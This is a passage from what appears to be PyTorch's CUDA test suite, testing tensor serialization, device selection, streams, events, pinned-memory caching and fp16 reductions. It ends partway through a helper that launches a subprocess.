dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of parent and child threads execution time is greater than the
# real execution time by least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used to soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
